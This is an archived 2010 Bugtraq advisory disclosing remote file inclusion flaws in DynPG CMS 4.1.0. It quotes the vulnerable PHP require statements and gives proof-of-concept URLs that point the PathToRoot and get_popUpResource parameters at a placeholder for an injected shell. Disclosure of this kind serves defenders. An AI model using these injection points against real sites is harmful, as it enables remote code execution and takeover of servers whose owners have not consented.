[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

DynPG CMS v4.1.0 Multiple Remote File Inclusion Vulnerability

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: DynPG CMS v4.1.0 Multiple Remote File Inclusion Vulnerability
From: eidelweiss@xxxxxxxxxxxxxxxxx
Date: Thu, 1 Apr 2010 06:38:44 -0600

Dear,

I found Some vulnerability in DynPG CMS , This the full exploit code:

[+]Title        :       DynPG CMS Multiple Remote File Inclusion Vulnerability
[+]Version:     4.1.0 (Other or lower versions may also be affected)
[+]Download:    http://www.dynpg.org/download_en.php
[+]License:     GNU / GPL
[+]Metode :     Remote File Inclusion
[+]Author:      eidelweiss

        [*]Special to Syabilla_putri (I miss u so much to)[*]

        [!]Thank`s Fly To:

[~] Jose Luis Gongora Fernandez a.k.a JosS
[~] exploit-db team (loneferret - Exploits - dookie2000ca)
[~] r0073r & 0x1D , [D]eal [C]yber

########################################################

Description:

DynPG is used to upload and manage dynamic web content similar to other content 
management systems.
DynPG however differs from other CMS, because it is embedded directly into 
websites.
The software was originally developed to realize designs that are created with 
Adobe Photoshop, Adobe Fireworks, Adobe Illustrator or any other graphics 
software.
The layout is created with an editor like Adobe Dreamweaver or Adobe GoLive or 
even as simple code.
After that, code snippets are placed at those points, where dynamically 
generated content (like articles, galleries, blogs or other dynamic content) 
shall be generated.
It provides a convenient way to extend existing websites with dynamic content. 
DynPG provides a template engine, but also supports existing CSS layouts.

########################################################

        -=[ Vuln C0de ]=-

[!] counter.php

                require_once $GLOBALS["DefineRootToTool"]."config.php"; // line 
15
                require_once $GLOBALS["DefineRootToTool"]."connectdb.php";      
// line 16


[!] /plugins/DPGguestbook/guestbookaction.php

<?php
    function dynPG_Guestbook_proceedREQ()
    {
      require_once $GLOBALS['DynPG']->PathToRoot .'config.php';
      require_once $GLOBALS['DynPG']->PathToRoot .'defines.php';
      require_once $GLOBALS['DynPG']->PathToRoot .'connectdb.php';


[!] /backendpopup/popup.php

        require './resources/' . $get_popUpResource . '/index.res.php'; // line 
36

[!] etc , etc , etc


        -=[ Proof Of Concept ]=-
        
        
http://127.0.0.1/DynPG_path/plugins/DPGguestbook/guestbookaction.php?PathToRoot=
 [inject0r sh3ll]
        http://127.0.0.1/DynPG_path/backendpopup/popup.php?get_popUpResource= 
[inj3ct0r sh3ll]

        etc , etc , etc
        
######################=[E0F]=#############################

Prev by Date: Zabbix <= 1.8.1 SQL Injection
Next by Date: VUPEN Security Research - Apple Quicktime FLC Encoded Movie Heap Overflow Vulnerability
Previous by thread: Zabbix <= 1.8.1 SQL Injection
Next by thread: Re: DynPG CMS v4.1.0 Multiple Remote File Inclusion Vulnerability
Index(es):
- Date
- Thread